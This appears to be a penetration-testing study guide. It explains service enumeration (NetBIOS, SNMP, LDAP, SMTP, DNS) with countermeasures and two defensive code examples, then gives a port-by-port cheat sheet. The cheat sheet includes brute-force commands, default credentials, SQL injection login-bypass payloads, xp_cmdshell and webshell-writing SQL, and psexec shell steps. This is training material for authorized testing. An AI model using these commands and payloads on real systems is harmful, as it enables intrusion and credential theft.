4. Enumeration

After finding a vulnerability, you exploit it through enumeration. Enumeration is the process of extracting user names, machine names, network resources, shares and services from a system. In this phase the attacker creates an active connection to the system and performs directed queries to gain more information about the target. The gathered information is used to identify vulnerabilities or weak points in the system's security, which are then exploited in the system-gaining phase.

Types of information enumerated by intruders:
- Network resources and shares
- Users and groups
- Routing tables
- Auditing and service settings
- Machine names
- Applications and banners
- SNMP and DNS details

Techniques for enumeration:
- Extracting user names using email IDs
- Extracting information using default passwords
- Brute-forcing Active Directory
- Extracting user names using SNMP
- Extracting user groups from Windows
- Extracting information using DNS zone transfers

Services and ports to enumerate:
- TCP 53: DNS zone transfer
- TCP 135: Microsoft RPC Endpoint Mapper
- TCP 137: NetBIOS Name Service
- TCP 139: NetBIOS Session Service (SMB over NetBIOS)
- TCP 445: SMB over TCP (Direct Host)
- UDP 161: SNMP
- TCP/UDP 389: LDAP
- TCP/UDP 3368: Global Catalog Service
- TCP 25: Simple Mail Transfer Protocol (SMTP)

NetBIOS Enumeration

NetBIOS stands for Network Basic Input Output System. It allows computers to communicate over a LAN and to share files and printers. NetBIOS names are used to identify network devices over TCP/IP (Windows). A NetBIOS name must be unique on a network and is limited to 16 characters: 15 characters hold the device name and the 16th is reserved for identifying the type of service running (the name record type).
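The 16-byte name layout described above, worked through as an added example (not code from the original notes): the name is padded to 15 bytes, the service suffix is appended as the 16th byte, and the whole thing is "first-level encoded" (RFC 1001) into the 32-character form that tools such as nmblookup and nbtscan see on the wire. The suffix table lists the common Microsoft suffix values; the host names in the usage are made up.

```python
# Added example: encode/decode NetBIOS names and interpret the 16th (suffix) byte.
# Suffix meanings are the well-known Microsoft values for the NetBIOS name types.
SUFFIXES = {
    0x00: "Workstation Service",
    0x03: "Messenger Service",
    0x1B: "Domain Master Browser",
    0x1C: "Domain Controllers",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections",
    0x20: "File Server Service",
}

ENCODED_ALPHABET = "ABCDEFGHIJKLMNOP"  # one letter per nibble value 0..15


def encode_name(name, suffix=0x00):
    """Pad NAME to 15 bytes, append SUFFIX, then split every byte into two
    nibbles and map each nibble to 'A'..'P' (32 ASCII characters on the wire)."""
    raw_name = name.upper().encode("ascii")
    if len(raw_name) > 15:
        raise ValueError("NetBIOS names are at most 15 characters")
    raw = raw_name.ljust(15, b" ") + bytes([suffix])
    return "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0x0F)) for b in raw)


def decode_name(encoded):
    """Reverse encode_name: return (name, suffix, suffix_description)."""
    if len(encoded) != 32 or any(c not in ENCODED_ALPHABET for c in encoded):
        raise ValueError("not a first-level encoded NetBIOS name")
    raw = bytes(((ord(encoded[i]) - 0x41) << 4) | (ord(encoded[i + 1]) - 0x41)
                for i in range(0, 32, 2))
    name = raw[:15].rstrip(b" ").decode("ascii")
    suffix = raw[15]
    return name, suffix, SUFFIXES.get(suffix, "unknown <%02x>" % suffix)


if __name__ == "__main__":
    # Constructed host names for the demonstration.
    for host, suffix in (("FILESRV", 0x20), ("DC01", 0x1C), ("WKS-07", 0x00)):
        wire = encode_name(host, suffix)
        print(wire, "->", decode_name(wire))
```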
Attackers use NetBIOS enumeration to obtain:
- the list of computers that belong to a domain
- the list of shares on the individual hosts on the network
- policies and passwords

Commands and tools used:
- Nbtstat: utility used to display protocol statistics, the NetBIOS name table and name cache details
- SuperScan: GUI tool used to enumerate Windows machines
- Net view: command-line tool to identify shared resources on a network

SNMP Enumeration

SNMP (Simple Network Management Protocol) is an application-layer protocol that uses UDP to maintain and manage routers, hubs, switches and other network devices on an IP network. SNMP is a very common protocol, found enabled on a variety of operating systems such as Windows Server, Linux and UNIX servers, as well as on network devices like routers and switches. SNMP enumeration is used to enumerate user accounts, passwords, groups, system names and devices on a target system.

It consists of three major components:
- Managed device: a device or host (technically known as a node) that has the SNMP service enabled. These devices can be routers, switches, hubs, bridges, computers etc.
- Agent: a piece of software that runs on a managed device. Its primary job is to convert the device's information into an SNMP-compatible format so that the network can be managed smoothly over SNMP.
- Network Management System (NMS): the software systems used to monitor the network devices.

An agent running on every SNMP device provides access to a readable and writable database. This database is the management information base (MIB): a hierarchically organised virtual database containing a formal description of every network object that can be managed via SNMP, each identified by a specific object identifier (OID). It is a giant repository of values and settings. A manager is also involved in the process; the manager queries the agent for the various details.
A community string is a text string used to authenticate communications between the management stations and the network devices on which SNMP agents are hosted. Community strings travel in clear text over the network and are therefore subject to sniffing attacks. A community string is sent with every packet exchanged between the node and the management station.

Two types of community strings:
- Read only: this mode permits querying the device and reading information, but does not permit any change to the configuration. The default community string for this mode is "public".
- Read write: in this mode changes to the device are permitted, so whoever connects with this community string can even modify the remote device's configuration. The default community string for this mode is "private".

When community strings are left at their default settings, attackers take the opportunity and find the loopholes in them.

A few tools:
- OpUtils Network Monitoring Toolset - http://www.manageengine.com
- SolarWinds (best SNMP enumeration tool) - www.solarwinds.com
- Command-line tools: snmpwalk, snmp-check

Countermeasures:
- Remove or disable SNMP agents on hosts
- Block port 161 at all perimeter network access devices
- Restrict access to specific IP addresses
- Use SNMPv3 (more secure)
- Implement the Group Policy security option "Additional restrictions for anonymous connections"
- Access to null session pipes and null session shares, and IPsec filtering, should also be restricted

LDAP Enumeration

The Lightweight Directory Access Protocol is used to access directory listings within Active Directory or other directory services. A directory is usually compiled in a hierarchical, logical format, rather like the levels of management and employees in a company. LDAP tends to be tied into the Domain Name System to allow integrated quick lookups and fast resolution of queries.
LDAP generally runs on port 389 and, like other protocols, usually conforms to a distinct set of rules (RFCs). It is possible to query the LDAP service, sometimes anonymously, to obtain a great deal of information: valid usernames, addresses and departmental details that the tester could use in a brute-force or social-engineering attack.

Tools:
- Jxplorer - http://www.jxplorer.org/
- LDAP Admin Tool - http://www.ldapsoft.com

Countermeasures:
- Use NTLM or Basic authentication to limit access to known users only.
- By default, LDAP traffic is transmitted unsecured; use SSL to encrypt the traffic.
- Select a username different from your email address and enable account lockout.

NTP Enumeration

The Network Time Protocol synchronises time across your network, which is especially important when using directory services. A number of time servers exist throughout the world that can be used to keep systems synced with each other. NTP uses UDP port 123. Through NTP enumeration you can gather information such as the list of hosts connected to the NTP server, their IP addresses, system names and the OSs running on the client systems in a network. All this information can be enumerated by querying the NTP server.

SMTP Enumeration

The Simple Mail Transfer Protocol is used to send email messages, as opposed to POP3 or IMAP, which can be used to both send and receive messages. SMTP relies on Mail Exchange (MX) servers, found via the Domain Name Service, to direct the mail to; should no MX server be found, SMTP falls back to an A record or alternatively SRV records. SMTP generally runs on port 25. SMTP enumeration allows us to determine valid users on the SMTP server. This is done with the help of built-in SMTP commands:
- VRFY - validates a user.
- EXPN - reveals the actual delivery addresses of aliases and mailing lists.
- RCPT TO - defines the recipients of the message.
Tool: NetScanTools Pro

Countermeasures:
- Configure the SMTP server to ignore email messages to unknown recipients.
- Don't include information such as the mail relay systems in use, internal IP addresses or host information.
- Disable the open relay feature.

DNS Enumeration

DNS enumeration is the process of locating all the DNS servers and their corresponding records for an organisation. DNS enumeration will yield usernames, computer names and IP addresses of potential target systems. The list of DNS record types gives an overview of the resource records (database records) stored in the zone files of the Domain Name System (DNS). The DNS implements a distributed, hierarchical and redundant database for information associated with Internet domain names and addresses.

A DNS zone transfer is used to replicate DNS data across a number of DNS servers or to back up DNS files. A user or server performs a specific zone transfer request to a name server. If the name server allows zone transfers by an anonymous user, all the DNS names and IP addresses hosted by the name server are returned in human-readable ASCII text.

Tools:
- nslookup
- maltego
- dnsenum
- dnsrecon

Countermeasures:
- Disable zone transfers to untrusted hosts
- Ensure that private hostnames are not mapped to IP addresses within the DNS zone files of publicly accessible DNS servers.
- Use premium registration services.
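Seen from the defender's side, the enumeration described in the SNMP, SMTP and DNS sections above (and the null sessions mentioned under SNMP countermeasures) leaves recognisable traces in server logs. The detector below is an added example, not code from the original notes or from any tool they list: it runs over a constructed syslog-style event stream and flags default community strings and SNMP walks, VRFY/EXPN probing, zone transfer requests from hosts that are not the configured secondary, and SMB session setups with an empty user. The line format, host names, IP addresses and thresholds are all assumptions made up for the example.

```python
"""Added example (not from the original notes): flag enumeration activity in a
constructed, syslog-style event stream. Format, hosts, IPs and thresholds are
all assumptions for this example, not any real daemon's log format."""
import re
from collections import Counter, defaultdict

# Constructed format: "<ts> <host> <service>: key=value key=value ..."
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<svc>\w+): (?P<kv>.*)$")

DEFAULT_COMMUNITIES = {"public", "private"}   # the defaults named in the notes
ALLOWED_AXFR_PEERS = {"10.0.0.2"}             # constructed secondary name server
VRFY_THRESHOLD = 5                            # VRFY/EXPN commands per source
SNMP_WALK_THRESHOLD = 10                      # distinct OIDs read per source


def parse_line(line):
    """Split one constructed log line into a dict; None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = {"ts": m["ts"], "host": m["host"], "svc": m["svc"]}
    for token in m["kv"].split():
        key, _, value = token.partition("=")
        ev[key] = value
    return ev


def detect(lines):
    """Return sorted (source_ip, finding) pairs for the whole stream."""
    findings = set()
    vrfy_count = Counter()          # VRFY/EXPN commands seen per source
    oids_seen = defaultdict(set)    # distinct OIDs read per source
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        src = ev.get("src", "?")
        if ev["svc"] == "snmpd":
            if ev.get("community") in DEFAULT_COMMUNITIES:
                findings.add((src, "snmp default community string accepted"))
            oids_seen[src].add(ev.get("oid"))
            if len(oids_seen[src]) >= SNMP_WALK_THRESHOLD:
                findings.add((src, "snmp walk (many distinct OIDs)"))
        elif ev["svc"] == "smtpd":
            if ev.get("cmd", "").upper() in ("VRFY", "EXPN"):
                vrfy_count[src] += 1
                if vrfy_count[src] >= VRFY_THRESHOLD:
                    findings.add((src, "smtp user enumeration via VRFY/EXPN"))
        elif ev["svc"] == "named":
            if ev.get("qtype") == "AXFR" and src not in ALLOWED_AXFR_PEERS:
                findings.add((src, "zone transfer request from non-secondary"))
        elif ev["svc"] == "smbd":
            if ev.get("action") == "session_setup" and ev.get("user") == "":
                findings.add((src, "smb null session"))
    return sorted(findings)


# Constructed sample stream: one noisy source (10.0.0.50), the legitimate
# secondary name server (10.0.0.2) and a host using a non-default community.
SAMPLE_LOG = (
    ["2024-05-01T10:00:%02dZ srv1 snmpd: src=10.0.0.50 community=public "
     "oid=1.3.6.1.2.1.1.%d.0" % (i, i) for i in range(1, 11)]
    + ["2024-05-01T10:01:%02dZ mx1 smtpd: src=10.0.0.50 cmd=VRFY arg=%s" % (i, u)
       for i, u in enumerate(["root", "admin", "backup", "test", "www"])]
    + ["2024-05-01T10:02:00Z ns1 named: src=10.0.0.2 qtype=AXFR zone=example.test",
       "2024-05-01T10:02:05Z ns1 named: src=10.0.0.50 qtype=AXFR zone=example.test",
       "2024-05-01T10:03:00Z fs1 smbd: src=10.0.0.50 action=session_setup user=",
       "2024-05-01T10:04:00Z srv1 snmpd: src=10.0.0.9 community=m0nitor-ro "
       "oid=1.3.6.1.2.1.1.5.0",
       "this line is not in the expected format and is skipped"]
)

if __name__ == "__main__":
    for src, finding in detect(SAMPLE_LOG):
        print("%-10s %s" % (src, finding))
```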
Scanning

NMAP TCP quick
> sudo nmap -Pn -v -sS -sV -sC -oN tcp-quick.nmap IP

NMAP TCP full
> sudo nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN tcp-full.nmap -sV IP

NMAP TCP - repeat if extra ports are found
> sudo nmap -Pn -v -sS -A -oN tcp-extra.nmap -p PORTS IP

NMAP UDP quick
> sudo nmap -Pn -v -sU -sV --top-ports=30 -oN udp-quick.nmap IP

NMAP UDP 1000
> sudo nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T4 -oN udp-1000.nmap IP

NMAP UDP - repeat if extra ports are found
> sudo nmap -Pn -sU -A -oN udp-extra.nmap -p PORTS IP

Enumeration

FTP - Port 21
- Check for FTP version vulns
- Check for anonymous login
- Check for read access
- Check for the web root or the root directories of any other accessible service
- Check for write access

SSH - Port 22
- Check for SSH version vulns
- Check for user enumeration if necessary
- Check if the host key was seen somewhere else
- Check if it prompts for a password - this means password login is allowed for some users
> nmap -sV --script=ssh-hostkey -p22 IP
- Bruteforce if necessary with CeWL, Hydra, Patator, Crowbar, MSF (if the port gets filtered, there are defence mechanisms such as fail2ban)

Telnet - Port 23
- Connect and check for the service running

SMTP - Port 25
- Check for SMTP vulns
- Check the version with HELO / HELLO

POP - Port 110
- Connect using telnet
> USER user
> PASS pass
> LIST - to list emails
> RETR - to retrieve emails

DNS - Port 53
- Might indicate a domain controller on Windows
- Check for zone transfer

Kerberos - Port 88
- Indication that it is a DC

NetBIOS - Port 139
> nmblookup -A IP
> nbtscan IP
On older hosts this port serves SMB / Samba; scan it by adding 'client min protocol = LANMAN1' to the [global] section of /etc/samba/smb.conf or by using --option='client min protocol'=LANMAN1 with smbclient

RPC - Port 135
> sudo nmap -sS -Pn -sV --script=rpcinfo.nse -p135 IP
> rpcinfo IP
> rpcclient -U "" -N IP

LDAP - Ports 389,636,3268,326
> sudo nmap -sS -Pn -sV --script=ldap* -p389,636,3268,3269 IP

WEB - Port 80 / 443
NMAP Web
> sudo nmap -Pn -sC -p80,443 IP

Checks
- Browse the webapp
- Check for usernames, keywords
- Check web server vulns
- Check for CGIs - Shellshock
- Check certificates for hostnames
- Check robots.txt
- Check sitemap.xml
- Check for known software - view source
- Check for default credentials
- Check for input validation - SQLi
- Check for OS command execution
- Check for LFI / RFI

Dirb
> dirb IP
> dirb with -X extensions based on the web technology: .php,.asp,.txt,.jsp
> dirb IP -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'

Gobuster
> gobuster dir --url IP --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt
> gobuster dir --url IP --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -k -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'

Nikto
> nikto -host IP

SMB - Ports 139,445
NMAP vuln scripts
> sudo nmap -Pn --script=smb-proto* -p139,445 IP
> sudo nmap -Pn --script=smb-os-discovery.nse -p139,445 IP
> sudo nmap -Pn --script=smb-enum* -p139,445 IP
> sudo nmap -Pn --script=smb-vuln* -p139,445 IP
> nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse IP
Check for null logins
> nmap --script smb-enum-shares -p 139,445 IP
> smbclient -L \\\\IP\\ -N
> smbclient -m SMB2 -L \\\\Hostname\\ -N
Connect to a share with a null session
> smbclient \\\\IP\\ADMIN\$ -N
> smbmap -H IP
> smbmap -u DoesNotExist -H IP
> enum4linux -a IP
Check permissions on a connected share
> smb: \> showacls # enable acl listing
> smb: \> dir # list directories with acls
Mount a share on the local machine
> sudo mount -t cifs //10.10.10.134/SHARENAME ~/path/to/mount_directory
List shares with credentials
> smbmap -u USERNAME -p PASSWORD -d DOMAIN.TLD -H IP
Recursively list all files in a share
> smbmap -R -H IP
> smbmap -R Replication -H IP
With smbclient (recurse downloads all files)
> smbclient //IP/Replication
> smb: \> recurse ON
> smb: \> prompt OFF
> smb: \> mget *
Upload / download specific files
> smbmap -H IP --download 'Replication\active.htb\'
> smbmap -H IP --upload test.txt SHARENAME/test.txt

NFS - Port 2049
> showmount -e IP
> mount -t nfs -o vers=3 10.1.1.1:/home/ ~/home
> mount -t nfs4 -o proto=tcp,port=2049 127.0.0.1:/srv/Share mountpoint

TFTPD - UDP 69
> tftp client to connect
> atftp is a better client
> Can be used to read system files, e.g. the MSSQL password mdf file

Finding exploits
- Search on EDB and searchsploit
- Check each service on CVE Details for RCE / LFI / RFI / SQLi issues
- Google search with the service banner

NETWORK ENUMERATION

Network enum - Ports
A quick checklist of possible attack vectors through the different ports.

TCP 21 - FTP
Checks
- Check if you have anonymous access
- Check if you can upload a file to trigger a webshell through the webapp
- Check if you can download backup files to extract included passwords
- Check the version of FTP for exploits
Commands
Login to the ftp server (for anonymous access, use "anonymous":"anonymous")
ftp $ip
FTP-specific nmap scan
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
Tip: Before starting scans, set a bash variable to the IP address you are scanning, like ip=10.11.1.1. The $ip value in the commands of this cheat sheet will then be filled in automatically.

22 - SSH
Checks
- Try easy username-password combinations
- Check for username enumeration vulnerabilities
- Check version for vulnerabilities
- (Only when getting desperate) Try brute force with Hydra, Medusa, ...
Commands
Nmap scan
nmap -p 22 -sV -Pn -T4 --script=ssh* $ip
Brute force
hydra -v -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 $ip ssh
hydra -l gibson -P /tmp/alpha.txt -T 20 $ip ssh
Connect through a found key
#make the key only accessible by the current user
chmod 0600 private.key
ssh user@$ip -i private.key

25 - SMTP
Checks
- Check for user enumeration
- Check version for exploits
Commands
nmap scan
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip
user enumeration
#manual way
nc -nvv $ip 25
VRFY root
(the user exists if the reply is "250 Georgia"; it doesn't exist if the reply is "551 user not local")
#automated way
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip

80/443 - HTTP(S)
Checks
- Login portals
  - try the default credentials of the application
  - try usernames already seen throughout the application or in other services like SMTP
  - try SQL injection bypasses
  - try registering a new user
  - brute force with hydra, medusa, ...
- Check robots.txt for hidden directories
- Brute force directories to find hidden content
- Check for passwords/URLs/versions/... in comments of the web app
- Check version numbers for known exploits
- Check the changelog for version information
- Estimate the version based on the copyright date (if not automatically adjusted)
- Check if a specific CMS is used, like WordPress, and then use platform-specific scanners
- Ways to RCE
  - check for file upload functionalities (if uploads are filtered, try alternative extensions)
  - execute commands through SQLi
  - Shellshock
  - command injection
  - trigger injected code through path traversal
Enumeration scans
Directory brute force
#start off with a general scan
gobuster dir -u http://$ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 50
#add extensions
gobuster dir -u http://$ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 100 -x php,txt,cgi,sh,pl,py -s "200,204,301,302,307,403,500"
nmap scan
nmap -sV -Pn --script=ssl-heartbleed,http-adobe-coldfusion-apsa1301.nse,http-apache-negotiation.nse,http-apache-server-status.nse,http-aspnet-debug.nse,http-auth-finder.nse,http-auth.nse,http-avaya-ipoffice-users.nse,http-awstatstotals-exec.nse,http-axis2-dir-traversal.nse,http-backup-finder.nse,http-barracuda-dir-traversal.nse,http-bigip-cookie.nse,http-brute.nse,http-cakephp-version.nse,http-cisco-anyconnect.nse,http-coldfusion-subzero.nse,http-comments-displayer.nse,http-config-backup.nse,http-cookie-flags.nse,http-cors.nse,http-cross-domain-policy.nse,http-csrf.nse,http-date.nse,http-default-accounts.nse,http-devframework.nse,http-dlink-backdoor.nse,http-dombased-xss.nse,http-domino-enum-passwords.nse,http-drupal-enum-users.nse,http-drupal-enum.nse,http-enum.nse,http-errors.nse,http-exif-spider.nse,http-feed.nse,http-fileupload-exploiter.nse,http-form-brute.nse,http-form-fuzzer.nse,http-frontpage-login.nse,http-git.nse,http-gitweb-projects-enum.nse,http-headers.nse,http-huawei-hg5xx-vuln.nse,http-iis-short-name-brute.nse,http-iis-webdav-vuln.nse,http-internal-ip-disclosure.nse,http-joomla-brute.nse,http-jsonp-detection.nse,http-litespeed-sourcecode-download.nse,http-ls.nse,http-majordomo2-dir-traversal.nse,http-mcmp.nse,http-method-tamper.nse,http-methods.nse,http-mobileversion-checker.nse,http-ntlm-info.nse,http-open-redirect.nse,http-passwd.nse,http-php-version.nse,http-phpmyadmin-dir-traversal.nse,http-phpself-xss.nse,http-proxy-brute.nse,http-put.nse,http-qnap-nas-info.nse,http-rfi-spider.nse,http-robots.txt.nse,http-security-headers.nse,http-server-header.nse,http-shellshock.nse,http-sitemap-generator.nse,http-sql-injection.nse,http-stored-xss.nse,http-svn-enum.nse,http-svn-info.nse,http-title.nse,http-tplink-dir-traversal.nse,http-trace.nse,http-traceroute.nse,http-trane-info.nse,http-unsafe-output-escaping.nse,http-useragent-tester.nse,http-userdir-enum.nse,http-vhosts.nse,http-vlcstreamer-ls.nse,http-vmware-path-vuln.nse,http-vuln-cve2006-3392.nse,http-vuln-cve2009-3960.nse,http-vuln-cve2010-0738.nse,http-vuln-cve2010-2861.nse,http-vuln-cve2011-3368.nse,http-vuln-cve2012-1823.nse,http-vuln-cve2013-0156.nse,http-vuln-cve2013-6786.nse,http-vuln-cve2013-7091.nse,http-vuln-cve2014-2126.nse,http-vuln-cve2014-2127.nse,http-vuln-cve2014-2128.nse,http-vuln-cve2014-3704.nse,http-vuln-cve2014-8877.nse,http-vuln-cve2015-1427.nse,http-vuln-cve2015-1635.nse,http-vuln-cve2017-1001000.nse,http-vuln-cve2017-5638.nse,http-vuln-cve2017-5689.nse,http-vuln-cve2017-8917.nse,http-vuln-misfortune-cookie.nse,http-vuln-wnr1000-creds.nse,http-waf-detect.nse,http-waf-fingerprint.nse,http-webdav-scan.nse,http-wordpress-brute.nse,http-wordpress-enum.nse,http-wordpress-users.nse,http-xssed.nse,membase-http-info.nse -p 80 $ip
webdav scanning
davtest --url http://$ip
davtest -move -sendbd auto -url http://$ip:8080/webdav/
cadaver http://$ip:8080/webdav/
Nikto scans
nikto -host $ip | tee nikto.log
Login portals
brute force login portals
#basic auth
hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
#login form
hydra -L users.txt -P users.txt $ip http-post-form ":login_username=^USER^&secretkey=^PASS^&:"
#create a custom password list
cewl -w cewl_passlist.txt -d 5 10.11.1.39/otrs/index.pl
Standard credentials you should try when being blocked by a login portal
admin:admin
admin:password
admin:administrator
admin:(name of box)
user:user
user:password
user:12345
guest:guest
root:root
(name of box):(name of box)
(default account):(name of application)
Try SQL injections to bypass the login form
' or 1=1;--
' or '1'='1
' or 1=1;#
') or ('x'='x
' or like '%';--
' or 1=1 LIMIT 1;--
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' or 1/* */ =1 --
admin' or 'a'='a
'#
File upload
Try alternative extensions for file uploads
- PHP: upload as pHp / phP / test.php.jpg; PHP extensions are .phtml, .php, .php3, .php4, .php5 and .inc
- ASP: .asp, .aspx
- Perl: .pl, .pm, .cgi, .lib
- JSP: .jsp, .jspx, .jsw, .jsv and .jspf
- ColdFusion: .cfm, .cfml, .cfc, .dbm
File traversal list
Path Traversal Cheat Sheet: Windows - GracefulSecurity (gracefulsecurity.com)
RCE through SQLi
#Through file creation
union all select "",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
#if running as database admin, use xp_cmdshell
http://www.example.com/news.asp?id=1; exec master.dbo.xp_cmdshell 'command'
'; exec master.dbo.xp_cmdshell 'command'
#On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1;--
RECONFIGURE;--
EXEC sp_configure 'xp_cmdshell', 1;--
RECONFIGURE;--
#On MSSQL 2000:
EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--
If you use exploits for web apps but they don't work as expected: proxy the network traffic through Burp and inspect the sent requests.

110 - POP3
Checks
- Check version for exploits
- Check mails for the presence of credentials
Commands
manually log in to the application
#connect and check for the banner
telnet $ip 110
#guess login credentials
USER pelle
PASS admin
#list all emails
list
#retrieve email number 5, for example
retr 5

111 - NFS/RPC
Checks
- Check for passwords in files on mountable drives
Commands
#check general rpc info
rpcinfo $ip
#Check what shares you can mount
showmount -e $ip
#mounting the share
#make the directory
mkdir /mnt/share
#mount the share
mount -t nfs -o nolock $ip:/share /mnt/share
Keep mountable shares in mind as they might be used in root squashing attacks to elevate your privileges to root.

139/445 - SMB
Checks
- Check for null sessions
- Check the permissions of users you already have
- Check for passwords in files
- Attempt brute force on enumerated users
- Check for EternalBlue
- Check the samba version (if Linux)
Commands (Automated)
nmap scan
#general scan
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse $ip -p 445
#vulnerability scan
nmap --script smb-vuln* -p 445 -oA nmap_smb_vulns $ip
Check samba versions
#save the code below as samba_version.sh and make it executable
./samba_version.sh
#samba_version.sh: sniff the Samba version string from the negotiation that smbclient triggers
if [ -z "$1" ]; then echo "Usage: ./samba_version.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z "$2" ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$$"
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""
enum4linux
enum4linux -a $ip
smbmap
#list general folders
smbmap -H $ip
#recursively list dirs and files
smbmap -R $sharename -H $ip
smbmap -R "Users" -H $ip -u Guest
#download a file
smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q
CrackMapExec
#check if you can connect through null sessions (check what rights you have on the shares)
cme smb $ip -u '' -p '' --shares
cme smb $ip -u '' -p '' --shares --port 139
#enumerate the users
#rid brute forcing
cme smb $ip -u "" -p "" --rid-brute
#active sessions
cme smb $ip -u '' -p '' --loggedon-users
#users in general
cme smb $ip -u '' -p '' --users
#enumerate the groups
#local groups
cme smb $ip -u '' -p '' --local-groups
#domain groups
cme smb $ip -u '' -p '' --groups
#check the password policy
cme smb $ip -u "" -p "" --pass-pol
mount shares and inspect files manually
#smbclient
smbclient -L $ip
smbclient //$ip/tmp
smbclient \\\\192.168.1.105\\ipc$ -U john
smbclient //$ip/ipc$ -U john
#mounting the share
mkdir /mnt/targetshare
mount -t cifs //172.16.20.88/ipc$ -o username=[username] /mnt/targetshare
brute force smb
hydra -l Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt $ip smb -V -f
#in OSCP the passwords are often equal to the username
hydra -L usernames.txt -P usernames.txt $ip smb -V -f
Gaining a shell through psexec (the user needs to be admin)
#copy the script
cp /usr/share/doc/python-impacket/examples/psexec.py .
#specific command test
python psexec.py :@10.11.1.227 whoami
#shell
rlwrap python psexec.py :@10.11.1.227
#NOTE: be careful with exclamation marks in passwords: rottenadmin:P@ssword123\!@192.168.194.140
#through crackmapexec (didn't always work for me)
cme smb 10.11.1.227 -u "backup" -p "backup" -x whoami

1433 - MSSQL
Checks
- Try default credentials "sa:password"
- Brute force creds
- Check database content for new passwords
- Check version for exploits
- RCE through the xp_cmdshell functionality, or by injecting a payload into an output file, placing it in the webroot and triggering it through the webapp
Commands
nmap
nmap -p 1433 --script='banner,(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)' $ip -oN 1433_nmap_mssql
credential brute force
nmap -p 1433 --script ms-sql-brute --script-args passdb=/usr/share/seclists/Passwords/darkweb2017-top1000.txt $ip
manually logging in and gaining a shell
#login
sqsh -S $ip -U sa -P password
sqsh -S $ip:27900 -U sa -P password
#execute commands
xp_cmdshell 'date'
go

3306 - MySQL
Checks
- Try default credentials "root":""
- Brute force credentials
- Check database content for new passwords
- Check version for exploits
Commands
nmap
nmap -sV -Pn --script=mysql-audit.nse,mysql-brute.nse,mysql-databases.nse,mysql-dump-hashes.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-query.nse,mysql-users.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p 3306 -oN 3306_nmap_mysql $ip
try the default password
mysql --host=$ip -u root -p

3389 - RDP
Checks
- Check if you can log in with the default guest account and a blank password
- Check if you can brute force users
- Check for BlueKeep
Commands
nmap
nmap -p 3389 --script=rdp-enum-encryption,rdp-vuln-ms12-020 $ip -oN 3389_nmap_rdp
manual login
rdesktop $ip
#Try the default guest account "guest":""
rdesktop -u guest $ip -g 94%
Start brute force
ncrack -vv --user Administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
ncrack -vv --user Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt rdp://$ip

5900 - VNC
Checks
- check for easy VNC passwords
- check for exploits for the VNC version
- brute force the VNC password
Commands
nmap
nmap -sV -Pn -p 5900 --script=vnc-info,vnc-title,realvnc-auth-bypass $ip -oA 5900_nmap_VNC
VNC brute force on the base password
hydra -s 5900 -P /usr/share/seclists/Passwords/darkweb2017-top10.txt -t 30 $ip vnc

UDP 53 - DNS
Checks
- Try zone transfer
- Brute force subdomains
Commands
do a DNS lookup specifying the DNS server
nslookup
#set the nameserver to the ip of the box
> server 10.10.10.13
#ask for the dns name of the box ip address
> 10.10.10.13
subdomain enumeration / brute force
dig axfr @$ip test.htb
fierce -dns ext.recon.lan -dnsserver 172.16.90.53
gobuster dns -d ext.recon.lan -r 172.16.90.53 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

69 - TFTP
Checks
- search for files to find sensitive info like passwords
- upload shells to trigger them in the web app
Commands
nmap
